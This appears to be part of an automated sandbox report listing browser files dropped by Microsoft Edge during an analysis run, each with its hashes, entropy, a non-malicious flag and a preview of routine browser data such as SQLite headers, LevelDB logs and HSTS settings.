                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 12, cookie 0x8, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24576
                                                                                                                                                                                    Entropy (8bit):1.9471933459273931
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:+BCyzp8Uq8QZyDayHjLzzAOiGT0CLr8eFaBo9eK:8N1898Q+aAjaGTP8129F
                                                                                                                                                                                    MD5:71DC0D1108167F965CAF301403F64B17
                                                                                                                                                                                    SHA1:137864676FB9D0D1E0AFE52DE1E6109F36E8AF4F
                                                                                                                                                                                    SHA-256:7131B89568388CA34FCAEF96700EC4241286B0143E6AAC9AA227B3D29978538F
                                                                                                                                                                                    SHA-512:23D8A1CE7CF5305440440C954B089FE3AA3A22BA50CFB0475AAE119D949D9BBCCAF094792E9630A36A57F7BB9AED4CCF19C322566578F1B2D606051F730D28B5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g....._.c...~.2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................s...;+...indexfavicon_bitmaps_icon_idfavico
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                    Entropy (8bit):0.6734628287643729
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:del07W4L+GPXBBE3upb0HtTTDxVjuRMI:de+7W4TvBBE3u1itPDqRMI
                                                                                                                                                                                    MD5:D6D7CA25D37D52A9206C3BEAE8A6F8C0
                                                                                                                                                                                    SHA1:A8660AA6D4E4914ECD9DE7D76C1F4858CCD1F0D7
                                                                                                                                                                                    SHA-256:F619BD0E40F0F092D5C16DBB993889DD5316F78C6FFA5CA3A0DEBBDA760D3D1C
                                                                                                                                                                                    SHA-512:8EA85E239A15A704F2ACE695053D494FCC099EEC774380F73EA8C0546622736CB926B0D018145C34F2C0C409A8B9735077876235864B7EC5167F17F2F877B4AD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):45056
                                                                                                                                                                                    Entropy (8bit):3.5489612341230825
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:zj9P0mYCcSQkQerkP/KbtZ773pLjgam6IHhRRKToaAu:zdhYFSe2kP/w7wX/RKcC
                                                                                                                                                                                    MD5:8CEB6F32ADD8065AA4A3E3C6A2556B5F
                                                                                                                                                                                    SHA1:25F44502EC75AC2F762F222E41864CF8E776F2BA
                                                                                                                                                                                    SHA-256:03778E8083DE4CE178F7B64514304457B7C952CAD0985392FC1E38B403A731EB
                                                                                                                                                                                    SHA-512:2F1841FB7EDA26795B8EC3905EE8CA3F871FED977E19D3732D3940A7D3F30F11A41E4B519EA4FC9482A42363D52BFF7B3629CE4C5BD9E29A7786A25A4B49EF8E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):406
                                                                                                                                                                                    Entropy (8bit):5.250732754885533
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:7eyvYfYeb8rcHEZrELFUtc/GR5JfYeb8rcHEZrEZSJ:7zYfYeb8nZrExgjJfYeb8nZrEZe
                                                                                                                                                                                    MD5:3DE79FFB412E93411D82E4930BEB3826
                                                                                                                                                                                    SHA1:626FF63C3673019784AD2199C8DCFFDC4F20664B
                                                                                                                                                                                    SHA-256:FEBC390EA770456AB5DBCFE3C43C18B0C469DEFF693F56F0EB00F4A186D42B60
                                                                                                                                                                                    SHA-512:35FDFACE8854234CF01D1A3B7D49194A29923485F1DDB6177717866F2D16BAB7BD60CA87E72C039A3B17A6BC0527B19751454AF7C6714A32BB0F101D089C1107
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:03.159 1a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-09:30:03.160 1a74 Recovering log #3.2025/01/09-09:30:03.160 1a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):406
                                                                                                                                                                                    Entropy (8bit):5.250732754885533
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:7eyvYfYeb8rcHEZrELFUtc/GR5JfYeb8rcHEZrEZSJ:7zYfYeb8nZrExgjJfYeb8nZrEZe
                                                                                                                                                                                    MD5:3DE79FFB412E93411D82E4930BEB3826
                                                                                                                                                                                    SHA1:626FF63C3673019784AD2199C8DCFFDC4F20664B
                                                                                                                                                                                    SHA-256:FEBC390EA770456AB5DBCFE3C43C18B0C469DEFF693F56F0EB00F4A186D42B60
                                                                                                                                                                                    SHA-512:35FDFACE8854234CF01D1A3B7D49194A29923485F1DDB6177717866F2D16BAB7BD60CA87E72C039A3B17A6BC0527B19751454AF7C6714A32BB0F101D089C1107
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:03.159 1a74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/09-09:30:03.160 1a74 Recovering log #3.2025/01/09-09:30:03.160 1a74 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):455
                                                                                                                                                                                    Entropy (8bit):5.425698243803755
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:TGMt1lW2WoYHxWPd3zSXWx0aDWP84shMFWLxWUiad6MmkWx07x:TGo1lW2W9WRzyWxPWPfshptWod6MXWxK
                                                                                                                                                                                    MD5:6909E7E2F466681356B37FEE41919BFE
                                                                                                                                                                                    SHA1:5D338AF74ADA3ABBADE407B026B6870FFCD3BF13
                                                                                                                                                                                    SHA-256:C85FBFDCE58CDFDDDC26A4F841DC64F164F4B7C1118E94C7AC6C7FA3E0CBD688
                                                                                                                                                                                    SHA-512:C0F16EE72CEEF4F7354F67578CA1481D858F93780BD52EDEBD9A344DD5ABB95FA55F613E33659E806421486697EA1F6C0597F670438A318A61B2001D8FCEB430
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:l.Q..................VERSION.1."META:https://copilot.microsoft.com...........4_https://copilot.microsoft.com..crossPromoFirstVisit..1736433010291.*_https://copilot.microsoft.com..i18nextLng..en-GB.F_https://copilot.microsoft.com..msal.request.mats-telemetry-profile-id%.01944b79-068d-7361-aa8d-36e4d672add3.Y_https://copilot.microsoft.com..Thu Jan 09 2025 09:30:11 GMT-0500 (Eastern Standard Time).5_https://copilot.microsoft.com..i18next.translate.boo
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):334
                                                                                                                                                                                    Entropy (8bit):5.148986529202905
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrGG+q2Pwkn23oH+Tcwt8a2jMGIFUtJGzRFZZmwPGBNVkwOwkn23oH+Tcwt8a23:7iHvYfYeb8EFUt4vZ/uBz5JfYeb8bJ
                                                                                                                                                                                    MD5:1C3FE0CD270C180629962CB1F5551A37
                                                                                                                                                                                    SHA1:A3650B053EA37D5C4675A9821D03B1F75330FF66
                                                                                                                                                                                    SHA-256:60AAC1AE4820163A831185C455CC78DACC264314583B9C7B3473779467AADA43
                                                                                                                                                                                    SHA-512:5EC73C4D6EEDA54DA93E1DBD215E1A70AE4289B31F6686C0154B680732D24C55FAA02CF9C11BA109B94B22C4DA13F06DD4358583011A6D80B753C02B1CEC8474
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:02.384 1318 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-09:30:02.385 1318 Recovering log #3.2025/01/09-09:30:02.387 1318 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):334
                                                                                                                                                                                    Entropy (8bit):5.148986529202905
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrGG+q2Pwkn23oH+Tcwt8a2jMGIFUtJGzRFZZmwPGBNVkwOwkn23oH+Tcwt8a23:7iHvYfYeb8EFUt4vZ/uBz5JfYeb8bJ
                                                                                                                                                                                    MD5:1C3FE0CD270C180629962CB1F5551A37
                                                                                                                                                                                    SHA1:A3650B053EA37D5C4675A9821D03B1F75330FF66
                                                                                                                                                                                    SHA-256:60AAC1AE4820163A831185C455CC78DACC264314583B9C7B3473779467AADA43
                                                                                                                                                                                    SHA-512:5EC73C4D6EEDA54DA93E1DBD215E1A70AE4289B31F6686C0154B680732D24C55FAA02CF9C11BA109B94B22C4DA13F06DD4358583011A6D80B753C02B1CEC8474
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:02.384 1318 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-09:30:02.385 1318 Recovering log #3.2025/01/09-09:30:02.387 1318 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):57344
                                                                                                                                                                                    Entropy (8bit):0.863060653641558
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                                    MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                                    SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                                    SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                                    SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):45056
                                                                                                                                                                                    Entropy (8bit):0.40293591932113104
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                                    MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                                    SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                                    SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                                    SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):188
                                                                                                                                                                                    Entropy (8bit):5.388626618780875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YWRAWNjnxhEDK5XdZH8f1JR8HQXwlm9yJUA6XcIR6RX77XMq+eJsbSQ:YWyWNLkaNi7R8wXwlmUUAnIMp53JKSQ
                                                                                                                                                                                    MD5:CFE186DC639D44593679018BD998204F
                                                                                                                                                                                    SHA1:B2F2F4DD68699FFD77794590E3E47AB6BB4C657D
                                                                                                                                                                                    SHA-256:22ADB051EF30A3AE519F9D38218FFD5313E983AF5BD01837EF63586E4AF375F2
                                                                                                                                                                                    SHA-512:DAE983628E587C4A1C8F1F21245A31A0B8B1BF689FCC65E9D516008FA8261A3EC031879228543F2B33D8602B2B9E579C49D657DD1815531651F995763DA9019E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"sts":[{"expiry":1767969010.269579,"host":"kggiPLwRhDW9CX2i1Y+2Wvkx9yfTHL6NhbYuo/NFvek=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1736433010.269585}],"version":2}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                    Entropy (8bit):2.4960013596846884
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:te+AugdZAX/z84HobuimOK79a/3cfcMzkUCl4RYWeEqYide371+fEhaeoJuJfQ/0:tTUAPzfIkal4yDv2P
                                                                                                                                                                                    MD5:497EB0BE635A821F574A0AB1003C8600
                                                                                                                                                                                    SHA1:D941F3293BB98E7F8F011E17C63043A3D5B4ABB8
                                                                                                                                                                                    SHA-256:7F032FE9A5723277F351A0ED53882418A80828CA0F58F7113899D3309F49AEC3
                                                                                                                                                                                    SHA-512:D240C7153D28026AAB83D6DAD1E8E18C46DCEEEBF2BCA457342F9987CD7104E8034F2F8F28B88D7EDD36A9DB0C1EF7173554337F9AF8DF2BA5FA0308A55AD0D0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                    Entropy (8bit):3.926136109079379
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                    MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                    SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                    SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                    SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                    Entropy (8bit):3.926136109079379
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                    MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                    SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                    SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                    SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                    Entropy (8bit):0.90671741756692
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBk/+:eIEumQv8m1ccnvS6FouMo4ojo32
                                                                                                                                                                                    MD5:AAABC80E841D24222078AFC3843A2833
                                                                                                                                                                                    SHA1:8ECE991AF0C2CE8BBDBE94EAC062FE798716725C
                                                                                                                                                                                    SHA-256:4024D2466D745869341B382EE948C97F01468D2E94C2CBDF8801088DC44C213F
                                                                                                                                                                                    SHA-512:F676A198A8F9110E8F3758D2E23843978F887EBBC9D393B906749685B22F920A98B3D14200B7658986B23AE225C3989F639A4A242A063E57192E0B691F0A0A16
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):203
                                                                                                                                                                                    Entropy (8bit):5.4042796420747425
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                    MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                    SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                    SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                    SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):203
                                                                                                                                                                                    Entropy (8bit):5.4042796420747425
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                    MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                    SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                    SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
